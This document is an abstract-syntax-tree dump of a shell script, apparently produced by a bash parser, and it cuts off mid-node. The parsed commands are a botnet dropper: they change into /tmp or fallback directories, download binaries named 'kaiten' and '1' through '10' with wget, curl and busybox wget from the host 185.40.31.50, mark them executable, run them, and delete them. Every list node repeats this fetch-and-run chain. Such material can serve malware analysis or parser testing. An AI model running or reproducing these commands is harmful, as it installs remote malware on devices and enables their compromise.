ListNode(lineno=3, pos=(12, 360), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='&&', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 54), parts=[
    WordNode(lineno=2, pos=(23, 27), word='wget'),
    WordNode(lineno=2, pos=(28, 54), word='http://185.40.31.50/kaiten'),
  ]),
  OperatorNode(lineno=2, op='&&', pos=(55, 57)),
  CommandNode(lineno=2, pos=(58, 92), parts=[
    WordNode(lineno=2, pos=(58, 62), word='curl'),
    WordNode(lineno=2, pos=(63, 65), word='-O'),
    WordNode(lineno=2, pos=(66, 92), word='http://185.40.31.50/kaiten'),
  ]),
  OperatorNode(lineno=2, op='&&', pos=(93, 95)),
  CommandNode(lineno=2, pos=(96, 135), parts=[
    WordNode(lineno=2, pos=(96, 103), word='busybox'),
    WordNode(lineno=2, pos=(104, 108), word='wget'),
    WordNode(lineno=2, pos=(109, 135), word='http://185.40.31.50/kaiten'),
  ]),
  OperatorNode(lineno=2, op='&&', pos=(136, 138)),
  CommandNode(lineno=2, pos=(139, 154), parts=[
    WordNode(lineno=2, pos=(139, 144), word='chmod'),
    WordNode(lineno=2, pos=(145, 147), word='+x'),
    WordNode(lineno=2, pos=(148, 154), word='kaiten'),
  ]),
  OperatorNode(lineno=2, op='&&', pos=(155, 157)),
  CommandNode(lineno=2, pos=(158, 166), parts=[
    WordNode(lineno=2, pos=(158, 166), word='./kaiten'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(166, 167)),
  CommandNode(lineno=2, pos=(168, 181), parts=[
    WordNode(lineno=2, pos=(168, 170), word='rm'),
    WordNode(lineno=2, pos=(171, 174), word='-rf'),
    WordNode(lineno=2, pos=(175, 181), word='kaiten'),
  ]),
  OperatorNode(lineno=2, op='&&', pos=(182, 184)),
  CommandNode(lineno=3, pos=(185, 192), parts=[
    WordNode(lineno=3, pos=(185, 187), word='cd'),
    WordNode(lineno=3, pos=(188, 192), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(193, 195)),
  CommandNode(lineno=3, pos=(196, 207), parts=[
    WordNode(lineno=3, pos=(196, 198), word='cd'),
    WordNode(lineno=3, pos=(199, 207), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(208, 210)),
  CommandNode(lineno=3, pos=(211, 218), parts=[
    WordNode(lineno=3, pos=(211, 213), word='cd'),
    WordNode(lineno=3, pos=(214, 218), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(219, 221)),
  CommandNode(lineno=3, pos=(222, 230), parts=[
    WordNode(lineno=3, pos=(222, 224), word='cd'),
    WordNode(lineno=3, pos=(225, 230), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(231, 233)),
  CommandNode(lineno=3, pos=(234, 238), parts=[
    WordNode(lineno=3, pos=(234, 236), word='cd'),
    WordNode(lineno=3, pos=(237, 238), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(238, 239)),
  CommandNode(lineno=3, pos=(240, 266), parts=[
    WordNode(lineno=3, pos=(240, 244), word='wget'),
    WordNode(lineno=3, pos=(245, 266), word='http://185.40.31.50/1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(266, 267)),
  CommandNode(lineno=3, pos=(268, 297), parts=[
    WordNode(lineno=3, pos=(268, 272), word='curl'),
    WordNode(lineno=3, pos=(273, 275), word='-O'),
    WordNode(lineno=3, pos=(276, 297), word='http://185.40.31.50/1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(297, 298)),
  CommandNode(lineno=3, pos=(299, 333), parts=[
    WordNode(lineno=3, pos=(299, 306), word='busybox'),
    WordNode(lineno=3, pos=(307, 311), word='wget'),
    WordNode(lineno=3, pos=(312, 333), word='http://185.40.31.50/1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(333, 334)),
  CommandNode(lineno=3, pos=(335, 345), parts=[
    WordNode(lineno=3, pos=(335, 340), word='chmod'),
    WordNode(lineno=3, pos=(341, 343), word='+x'),
    WordNode(lineno=3, pos=(344, 345), word='1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(345, 346)),
  CommandNode(lineno=3, pos=(347, 350), parts=[
    WordNode(lineno=3, pos=(347, 350), word='./1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(350, 351)),
  CommandNode(lineno=3, pos=(352, 360), parts=[
    WordNode(lineno=3, pos=(352, 354), word='rm'),
    WordNode(lineno=3, pos=(355, 358), word='-rf'),
    WordNode(lineno=3, pos=(359, 360), word='1'),
  ]),
])
ListNode(lineno=4, pos=(361, 536), parts=[
  CommandNode(lineno=4, pos=(361, 368), parts=[
    WordNode(lineno=4, pos=(361, 363), word='cd'),
    WordNode(lineno=4, pos=(364, 368), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(369, 371)),
  CommandNode(lineno=4, pos=(372, 383), parts=[
    WordNode(lineno=4, pos=(372, 374), word='cd'),
    WordNode(lineno=4, pos=(375, 383), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(384, 386)),
  CommandNode(lineno=4, pos=(387, 394), parts=[
    WordNode(lineno=4, pos=(387, 389), word='cd'),
    WordNode(lineno=4, pos=(390, 394), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(395, 397)),
  CommandNode(lineno=4, pos=(398, 406), parts=[
    WordNode(lineno=4, pos=(398, 400), word='cd'),
    WordNode(lineno=4, pos=(401, 406), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(407, 409)),
  CommandNode(lineno=4, pos=(410, 414), parts=[
    WordNode(lineno=4, pos=(410, 412), word='cd'),
    WordNode(lineno=4, pos=(413, 414), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(414, 415)),
  CommandNode(lineno=4, pos=(416, 442), parts=[
    WordNode(lineno=4, pos=(416, 420), word='wget'),
    WordNode(lineno=4, pos=(421, 442), word='http://185.40.31.50/2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(442, 443)),
  CommandNode(lineno=4, pos=(444, 473), parts=[
    WordNode(lineno=4, pos=(444, 448), word='curl'),
    WordNode(lineno=4, pos=(449, 451), word='-O'),
    WordNode(lineno=4, pos=(452, 473), word='http://185.40.31.50/2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(473, 474)),
  CommandNode(lineno=4, pos=(475, 509), parts=[
    WordNode(lineno=4, pos=(475, 482), word='busybox'),
    WordNode(lineno=4, pos=(483, 487), word='wget'),
    WordNode(lineno=4, pos=(488, 509), word='http://185.40.31.50/2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(509, 510)),
  CommandNode(lineno=4, pos=(511, 521), parts=[
    WordNode(lineno=4, pos=(511, 516), word='chmod'),
    WordNode(lineno=4, pos=(517, 519), word='+x'),
    WordNode(lineno=4, pos=(520, 521), word='2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(521, 522)),
  CommandNode(lineno=4, pos=(523, 526), parts=[
    WordNode(lineno=4, pos=(523, 526), word='./2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(526, 527)),
  CommandNode(lineno=4, pos=(528, 536), parts=[
    WordNode(lineno=4, pos=(528, 530), word='rm'),
    WordNode(lineno=4, pos=(531, 534), word='-rf'),
    WordNode(lineno=4, pos=(535, 536), word='2'),
  ]),
])
ListNode(lineno=5, pos=(537, 712), parts=[
  CommandNode(lineno=5, pos=(537, 544), parts=[
    WordNode(lineno=5, pos=(537, 539), word='cd'),
    WordNode(lineno=5, pos=(540, 544), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(545, 547)),
  CommandNode(lineno=5, pos=(548, 559), parts=[
    WordNode(lineno=5, pos=(548, 550), word='cd'),
    WordNode(lineno=5, pos=(551, 559), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(560, 562)),
  CommandNode(lineno=5, pos=(563, 570), parts=[
    WordNode(lineno=5, pos=(563, 565), word='cd'),
    WordNode(lineno=5, pos=(566, 570), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(571, 573)),
  CommandNode(lineno=5, pos=(574, 582), parts=[
    WordNode(lineno=5, pos=(574, 576), word='cd'),
    WordNode(lineno=5, pos=(577, 582), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(583, 585)),
  CommandNode(lineno=5, pos=(586, 590), parts=[
    WordNode(lineno=5, pos=(586, 588), word='cd'),
    WordNode(lineno=5, pos=(589, 590), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(590, 591)),
  CommandNode(lineno=5, pos=(592, 618), parts=[
    WordNode(lineno=5, pos=(592, 596), word='wget'),
    WordNode(lineno=5, pos=(597, 618), word='http://185.40.31.50/3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(618, 619)),
  CommandNode(lineno=5, pos=(620, 649), parts=[
    WordNode(lineno=5, pos=(620, 624), word='curl'),
    WordNode(lineno=5, pos=(625, 627), word='-O'),
    WordNode(lineno=5, pos=(628, 649), word='http://185.40.31.50/3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(649, 650)),
  CommandNode(lineno=5, pos=(651, 685), parts=[
    WordNode(lineno=5, pos=(651, 658), word='busybox'),
    WordNode(lineno=5, pos=(659, 663), word='wget'),
    WordNode(lineno=5, pos=(664, 685), word='http://185.40.31.50/3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(685, 686)),
  CommandNode(lineno=5, pos=(687, 697), parts=[
    WordNode(lineno=5, pos=(687, 692), word='chmod'),
    WordNode(lineno=5, pos=(693, 695), word='+x'),
    WordNode(lineno=5, pos=(696, 697), word='3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(697, 698)),
  CommandNode(lineno=5, pos=(699, 702), parts=[
    WordNode(lineno=5, pos=(699, 702), word='./3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(702, 703)),
  CommandNode(lineno=5, pos=(704, 712), parts=[
    WordNode(lineno=5, pos=(704, 706), word='rm'),
    WordNode(lineno=5, pos=(707, 710), word='-rf'),
    WordNode(lineno=5, pos=(711, 712), word='3'),
  ]),
])
ListNode(lineno=6, pos=(713, 888), parts=[
  CommandNode(lineno=6, pos=(713, 720), parts=[
    WordNode(lineno=6, pos=(713, 715), word='cd'),
    WordNode(lineno=6, pos=(716, 720), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(721, 723)),
  CommandNode(lineno=6, pos=(724, 735), parts=[
    WordNode(lineno=6, pos=(724, 726), word='cd'),
    WordNode(lineno=6, pos=(727, 735), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(736, 738)),
  CommandNode(lineno=6, pos=(739, 746), parts=[
    WordNode(lineno=6, pos=(739, 741), word='cd'),
    WordNode(lineno=6, pos=(742, 746), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(747, 749)),
  CommandNode(lineno=6, pos=(750, 758), parts=[
    WordNode(lineno=6, pos=(750, 752), word='cd'),
    WordNode(lineno=6, pos=(753, 758), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(759, 761)),
  CommandNode(lineno=6, pos=(762, 766), parts=[
    WordNode(lineno=6, pos=(762, 764), word='cd'),
    WordNode(lineno=6, pos=(765, 766), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(766, 767)),
  CommandNode(lineno=6, pos=(768, 794), parts=[
    WordNode(lineno=6, pos=(768, 772), word='wget'),
    WordNode(lineno=6, pos=(773, 794), word='http://185.40.31.50/4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(794, 795)),
  CommandNode(lineno=6, pos=(796, 825), parts=[
    WordNode(lineno=6, pos=(796, 800), word='curl'),
    WordNode(lineno=6, pos=(801, 803), word='-O'),
    WordNode(lineno=6, pos=(804, 825), word='http://185.40.31.50/4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(825, 826)),
  CommandNode(lineno=6, pos=(827, 861), parts=[
    WordNode(lineno=6, pos=(827, 834), word='busybox'),
    WordNode(lineno=6, pos=(835, 839), word='wget'),
    WordNode(lineno=6, pos=(840, 861), word='http://185.40.31.50/4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(861, 862)),
  CommandNode(lineno=6, pos=(863, 873), parts=[
    WordNode(lineno=6, pos=(863, 868), word='chmod'),
    WordNode(lineno=6, pos=(869, 871), word='+x'),
    WordNode(lineno=6, pos=(872, 873), word='4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(873, 874)),
  CommandNode(lineno=6, pos=(875, 878), parts=[
    WordNode(lineno=6, pos=(875, 878), word='./4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(878, 879)),
  CommandNode(lineno=6, pos=(880, 888), parts=[
    WordNode(lineno=6, pos=(880, 882), word='rm'),
    WordNode(lineno=6, pos=(883, 886), word='-rf'),
    WordNode(lineno=6, pos=(887, 888), word='4'),
  ]),
])
ListNode(lineno=7, pos=(889, 1064), parts=[
  CommandNode(lineno=7, pos=(889, 896), parts=[
    WordNode(lineno=7, pos=(889, 891), word='cd'),
    WordNode(lineno=7, pos=(892, 896), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(897, 899)),
  CommandNode(lineno=7, pos=(900, 911), parts=[
    WordNode(lineno=7, pos=(900, 902), word='cd'),
    WordNode(lineno=7, pos=(903, 911), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(912, 914)),
  CommandNode(lineno=7, pos=(915, 922), parts=[
    WordNode(lineno=7, pos=(915, 917), word='cd'),
    WordNode(lineno=7, pos=(918, 922), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(923, 925)),
  CommandNode(lineno=7, pos=(926, 934), parts=[
    WordNode(lineno=7, pos=(926, 928), word='cd'),
    WordNode(lineno=7, pos=(929, 934), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(935, 937)),
  CommandNode(lineno=7, pos=(938, 942), parts=[
    WordNode(lineno=7, pos=(938, 940), word='cd'),
    WordNode(lineno=7, pos=(941, 942), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(942, 943)),
  CommandNode(lineno=7, pos=(944, 970), parts=[
    WordNode(lineno=7, pos=(944, 948), word='wget'),
    WordNode(lineno=7, pos=(949, 970), word='http://185.40.31.50/5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(970, 971)),
  CommandNode(lineno=7, pos=(972, 1001), parts=[
    WordNode(lineno=7, pos=(972, 976), word='curl'),
    WordNode(lineno=7, pos=(977, 979), word='-O'),
    WordNode(lineno=7, pos=(980, 1001), word='http://185.40.31.50/5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1001, 1002)),
  CommandNode(lineno=7, pos=(1003, 1037), parts=[
    WordNode(lineno=7, pos=(1003, 1010), word='busybox'),
    WordNode(lineno=7, pos=(1011, 1015), word='wget'),
    WordNode(lineno=7, pos=(1016, 1037), word='http://185.40.31.50/5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1037, 1038)),
  CommandNode(lineno=7, pos=(1039, 1049), parts=[
    WordNode(lineno=7, pos=(1039, 1044), word='chmod'),
    WordNode(lineno=7, pos=(1045, 1047), word='+x'),
    WordNode(lineno=7, pos=(1048, 1049), word='5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1049, 1050)),
  CommandNode(lineno=7, pos=(1051, 1054), parts=[
    WordNode(lineno=7, pos=(1051, 1054), word='./5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1054, 1055)),
  CommandNode(lineno=7, pos=(1056, 1064), parts=[
    WordNode(lineno=7, pos=(1056, 1058), word='rm'),
    WordNode(lineno=7, pos=(1059, 1062), word='-rf'),
    WordNode(lineno=7, pos=(1063, 1064), word='5'),
  ]),
])
ListNode(lineno=8, pos=(1065, 1240), parts=[
  CommandNode(lineno=8, pos=(1065, 1072), parts=[
    WordNode(lineno=8, pos=(1065, 1067), word='cd'),
    WordNode(lineno=8, pos=(1068, 1072), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1073, 1075)),
  CommandNode(lineno=8, pos=(1076, 1087), parts=[
    WordNode(lineno=8, pos=(1076, 1078), word='cd'),
    WordNode(lineno=8, pos=(1079, 1087), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1088, 1090)),
  CommandNode(lineno=8, pos=(1091, 1098), parts=[
    WordNode(lineno=8, pos=(1091, 1093), word='cd'),
    WordNode(lineno=8, pos=(1094, 1098), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1099, 1101)),
  CommandNode(lineno=8, pos=(1102, 1110), parts=[
    WordNode(lineno=8, pos=(1102, 1104), word='cd'),
    WordNode(lineno=8, pos=(1105, 1110), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1111, 1113)),
  CommandNode(lineno=8, pos=(1114, 1118), parts=[
    WordNode(lineno=8, pos=(1114, 1116), word='cd'),
    WordNode(lineno=8, pos=(1117, 1118), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1118, 1119)),
  CommandNode(lineno=8, pos=(1120, 1146), parts=[
    WordNode(lineno=8, pos=(1120, 1124), word='wget'),
    WordNode(lineno=8, pos=(1125, 1146), word='http://185.40.31.50/6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1146, 1147)),
  CommandNode(lineno=8, pos=(1148, 1177), parts=[
    WordNode(lineno=8, pos=(1148, 1152), word='curl'),
    WordNode(lineno=8, pos=(1153, 1155), word='-O'),
    WordNode(lineno=8, pos=(1156, 1177), word='http://185.40.31.50/6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1177, 1178)),
  CommandNode(lineno=8, pos=(1179, 1213), parts=[
    WordNode(lineno=8, pos=(1179, 1186), word='busybox'),
    WordNode(lineno=8, pos=(1187, 1191), word='wget'),
    WordNode(lineno=8, pos=(1192, 1213), word='http://185.40.31.50/6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1213, 1214)),
  CommandNode(lineno=8, pos=(1215, 1225), parts=[
    WordNode(lineno=8, pos=(1215, 1220), word='chmod'),
    WordNode(lineno=8, pos=(1221, 1223), word='+x'),
    WordNode(lineno=8, pos=(1224, 1225), word='6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1225, 1226)),
  CommandNode(lineno=8, pos=(1227, 1230), parts=[
    WordNode(lineno=8, pos=(1227, 1230), word='./6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1230, 1231)),
  CommandNode(lineno=8, pos=(1232, 1240), parts=[
    WordNode(lineno=8, pos=(1232, 1234), word='rm'),
    WordNode(lineno=8, pos=(1235, 1238), word='-rf'),
    WordNode(lineno=8, pos=(1239, 1240), word='6'),
  ]),
])
ListNode(lineno=9, pos=(1241, 1416), parts=[
  CommandNode(lineno=9, pos=(1241, 1248), parts=[
    WordNode(lineno=9, pos=(1241, 1243), word='cd'),
    WordNode(lineno=9, pos=(1244, 1248), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1249, 1251)),
  CommandNode(lineno=9, pos=(1252, 1263), parts=[
    WordNode(lineno=9, pos=(1252, 1254), word='cd'),
    WordNode(lineno=9, pos=(1255, 1263), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1264, 1266)),
  CommandNode(lineno=9, pos=(1267, 1274), parts=[
    WordNode(lineno=9, pos=(1267, 1269), word='cd'),
    WordNode(lineno=9, pos=(1270, 1274), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1275, 1277)),
  CommandNode(lineno=9, pos=(1278, 1286), parts=[
    WordNode(lineno=9, pos=(1278, 1280), word='cd'),
    WordNode(lineno=9, pos=(1281, 1286), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1287, 1289)),
  CommandNode(lineno=9, pos=(1290, 1294), parts=[
    WordNode(lineno=9, pos=(1290, 1292), word='cd'),
    WordNode(lineno=9, pos=(1293, 1294), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1294, 1295)),
  CommandNode(lineno=9, pos=(1296, 1322), parts=[
    WordNode(lineno=9, pos=(1296, 1300), word='wget'),
    WordNode(lineno=9, pos=(1301, 1322), word='http://185.40.31.50/7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1322, 1323)),
  CommandNode(lineno=9, pos=(1324, 1353), parts=[
    WordNode(lineno=9, pos=(1324, 1328), word='curl'),
    WordNode(lineno=9, pos=(1329, 1331), word='-O'),
    WordNode(lineno=9, pos=(1332, 1353), word='http://185.40.31.50/7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1353, 1354)),
  CommandNode(lineno=9, pos=(1355, 1389), parts=[
    WordNode(lineno=9, pos=(1355, 1362), word='busybox'),
    WordNode(lineno=9, pos=(1363, 1367), word='wget'),
    WordNode(lineno=9, pos=(1368, 1389), word='http://185.40.31.50/7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1389, 1390)),
  CommandNode(lineno=9, pos=(1391, 1401), parts=[
    WordNode(lineno=9, pos=(1391, 1396), word='chmod'),
    WordNode(lineno=9, pos=(1397, 1399), word='+x'),
    WordNode(lineno=9, pos=(1400, 1401), word='7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1401, 1402)),
  CommandNode(lineno=9, pos=(1403, 1406), parts=[
    WordNode(lineno=9, pos=(1403, 1406), word='./7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1406, 1407)),
  CommandNode(lineno=9, pos=(1408, 1416), parts=[
    WordNode(lineno=9, pos=(1408, 1410), word='rm'),
    WordNode(lineno=9, pos=(1411, 1414), word='-rf'),
    WordNode(lineno=9, pos=(1415, 1416), word='7'),
  ]),
])
ListNode(lineno=10, pos=(1417, 1592), parts=[
  CommandNode(lineno=10, pos=(1417, 1424), parts=[
    WordNode(lineno=10, pos=(1417, 1419), word='cd'),
    WordNode(lineno=10, pos=(1420, 1424), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1425, 1427)),
  CommandNode(lineno=10, pos=(1428, 1439), parts=[
    WordNode(lineno=10, pos=(1428, 1430), word='cd'),
    WordNode(lineno=10, pos=(1431, 1439), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1440, 1442)),
  CommandNode(lineno=10, pos=(1443, 1450), parts=[
    WordNode(lineno=10, pos=(1443, 1445), word='cd'),
    WordNode(lineno=10, pos=(1446, 1450), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1451, 1453)),
  CommandNode(lineno=10, pos=(1454, 1462), parts=[
    WordNode(lineno=10, pos=(1454, 1456), word='cd'),
    WordNode(lineno=10, pos=(1457, 1462), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1463, 1465)),
  CommandNode(lineno=10, pos=(1466, 1470), parts=[
    WordNode(lineno=10, pos=(1466, 1468), word='cd'),
    WordNode(lineno=10, pos=(1469, 1470), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1470, 1471)),
  CommandNode(lineno=10, pos=(1472, 1498), parts=[
    WordNode(lineno=10, pos=(1472, 1476), word='wget'),
    WordNode(lineno=10, pos=(1477, 1498), word='http://185.40.31.50/8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1498, 1499)),
  CommandNode(lineno=10, pos=(1500, 1529), parts=[
    WordNode(lineno=10, pos=(1500, 1504), word='curl'),
    WordNode(lineno=10, pos=(1505, 1507), word='-O'),
    WordNode(lineno=10, pos=(1508, 1529), word='http://185.40.31.50/8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1529, 1530)),
  CommandNode(lineno=10, pos=(1531, 1565), parts=[
    WordNode(lineno=10, pos=(1531, 1538), word='busybox'),
    WordNode(lineno=10, pos=(1539, 1543), word='wget'),
    WordNode(lineno=10, pos=(1544, 1565), word='http://185.40.31.50/8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1565, 1566)),
  CommandNode(lineno=10, pos=(1567, 1577), parts=[
    WordNode(lineno=10, pos=(1567, 1572), word='chmod'),
    WordNode(lineno=10, pos=(1573, 1575), word='+x'),
    WordNode(lineno=10, pos=(1576, 1577), word='8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1577, 1578)),
  CommandNode(lineno=10, pos=(1579, 1582), parts=[
    WordNode(lineno=10, pos=(1579, 1582), word='./8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1582, 1583)),
  CommandNode(lineno=10, pos=(1584, 1592), parts=[
    WordNode(lineno=10, pos=(1584, 1586), word='rm'),
    WordNode(lineno=10, pos=(1587, 1590), word='-rf'),
    WordNode(lineno=10, pos=(1591, 1592), word='8'),
  ]),
])
ListNode(lineno=11, pos=(1593, 1768), parts=[
  CommandNode(lineno=11, pos=(1593, 1600), parts=[
    WordNode(lineno=11, pos=(1593, 1595), word='cd'),
    WordNode(lineno=11, pos=(1596, 1600), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1601, 1603)),
  CommandNode(lineno=11, pos=(1604, 1615), parts=[
    WordNode(lineno=11, pos=(1604, 1606), word='cd'),
    WordNode(lineno=11, pos=(1607, 1615), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1616, 1618)),
  CommandNode(lineno=11, pos=(1619, 1626), parts=[
    WordNode(lineno=11, pos=(1619, 1621), word='cd'),
    WordNode(lineno=11, pos=(1622, 1626), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1627, 1629)),
  CommandNode(lineno=11, pos=(1630, 1638), parts=[
    WordNode(lineno=11, pos=(1630, 1632), word='cd'),
    WordNode(lineno=11, pos=(1633, 1638), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1639, 1641)),
  CommandNode(lineno=11, pos=(1642, 1646), parts=[
    WordNode(lineno=11, pos=(1642, 1644), word='cd'),
    WordNode(lineno=11, pos=(1645, 1646), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1646, 1647)),
  CommandNode(lineno=11, pos=(1648, 1674), parts=[
    WordNode(lineno=11, pos=(1648, 1652), word='wget'),
    WordNode(lineno=11, pos=(1653, 1674), word='http://185.40.31.50/9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1674, 1675)),
  CommandNode(lineno=11, pos=(1676, 1705), parts=[
    WordNode(lineno=11, pos=(1676, 1680), word='curl'),
    WordNode(lineno=11, pos=(1681, 1683), word='-O'),
    WordNode(lineno=11, pos=(1684, 1705), word='http://185.40.31.50/9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1705, 1706)),
  CommandNode(lineno=11, pos=(1707, 1741), parts=[
    WordNode(lineno=11, pos=(1707, 1714), word='busybox'),
    WordNode(lineno=11, pos=(1715, 1719), word='wget'),
    WordNode(lineno=11, pos=(1720, 1741), word='http://185.40.31.50/9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1741, 1742)),
  CommandNode(lineno=11, pos=(1743, 1753), parts=[
    WordNode(lineno=11, pos=(1743, 1748), word='chmod'),
    WordNode(lineno=11, pos=(1749, 1751), word='+x'),
    WordNode(lineno=11, pos=(1752, 1753), word='9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1753, 1754)),
  CommandNode(lineno=11, pos=(1755, 1758), parts=[
    WordNode(lineno=11, pos=(1755, 1758), word='./9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1758, 1759)),
  CommandNode(lineno=11, pos=(1760, 1768), parts=[
    WordNode(lineno=11, pos=(1760, 1762), word='rm'),
    WordNode(lineno=11, pos=(1763, 1766), word='-rf'),
    WordNode(lineno=11, pos=(1767, 1768), word='9'),
  ]),
])
ListNode(lineno=12, pos=(1769, 1950), parts=[
  CommandNode(lineno=12, pos=(1769, 1776), parts=[
    WordNode(lineno=12, pos=(1769, 1771), word='cd'),
    WordNode(lineno=12, pos=(1772, 1776), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1777, 1779)),
  CommandNode(lineno=12, pos=(1780, 1791), parts=[
    WordNode(lineno=12, pos=(1780, 1782), word='cd'),
    WordNode(lineno=12, pos=(1783, 1791), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1792, 1794)),
  CommandNode(lineno=12, pos=(1795, 1802), parts=[
    WordNode(lineno=12, pos=(1795, 1797), word='cd'),
    WordNode(lineno=12, pos=(1798, 1802), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1803, 1805)),
  CommandNode(lineno=12, pos=(1806, 1814), parts=[
    WordNode(lineno=12, pos=(1806, 1808), word='cd'),
    WordNode(lineno=12, pos=(1809, 1814), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1815, 1817)),
  CommandNode(lineno=12, pos=(1818, 1822), parts=[
    WordNode(lineno=12, pos=(1818, 1820), word='cd'),
    WordNode(lineno=12, pos=(1821, 1822), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1822, 1823)),
  CommandNode(lineno=12, pos=(1824, 1851), parts=[
    WordNode(lineno=12, pos=(1824, 1828), word='wget'),
    WordNode(lineno=12, pos=(1829, 1851), word='http://185.40.31.50/10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1851, 1852)),
  CommandNode(lineno=12, pos=(1853, 1883), parts=[
    WordNode(lineno=12, pos=(1853, 1857), word='curl'),
    WordNode(lineno=12, pos=(1858, 1860), word='-O'),
    WordNode(lineno=12, pos=(1861, 1883), word='http://185.40.31.50/10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1883, 1884)),
  CommandNode(lineno=12, pos=(1885, 1920), parts=[
